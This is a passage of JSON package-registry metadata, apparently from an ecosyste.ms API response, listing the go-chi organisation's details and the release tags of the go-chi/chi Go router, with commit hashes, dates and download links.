/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g